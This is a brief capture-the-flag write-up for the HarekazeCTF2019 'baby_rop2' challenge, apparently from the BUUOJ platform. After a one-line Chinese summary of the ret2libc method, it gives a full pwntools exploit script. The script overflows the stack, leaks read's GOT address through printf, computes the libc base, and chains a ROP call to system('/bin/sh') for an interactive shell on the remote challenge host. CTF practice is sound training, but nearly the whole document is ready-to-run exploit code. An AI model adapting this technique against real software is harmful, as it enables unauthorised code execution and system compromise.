[HarekazeCTF2019]baby_rop2

ret2libc

通过printf泄露read的函数地址计算libc的基址，ROP链构造system(‘/bin/sh’)

from pwn import *

r=remote('node3.buuoj.cn',26686)
elf=ELF('./babyrop2')
libc=ELF('./libc.so.6')

rdi_ret=0x400733
rsi_r15_ret=0x400731
format_str=0x400770  #%s
read_got=elf.got['read']
printf_plt=elf.plt['printf']
main_addr=0x400636

payload='a'*0x20+'b'*0x8
payload+=p64(rdi_ret)+p64(format_str)
payload+=p64(rsi_r15_ret)+p64(read_got)+p64(0x0)
payload+=p64(printf_plt)+p64(main_addr)

r.recvuntil("What's your name?")
r.sendline(payload)

read_addr=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base=read_addr-libc.symbols['read']
system_addr=libc_base+libc.symbols['system']
binsh_addr=libc_base+libc.search('/bin/sh').next()

payload2='a'*0x20+'b'*0x8+p64(rdi_ret)+p64(binsh_addr)+p64(system_addr)+p64(main_addr)
r.recvuntil("What's your name?")
r.sendline(payload2)

r.interactive()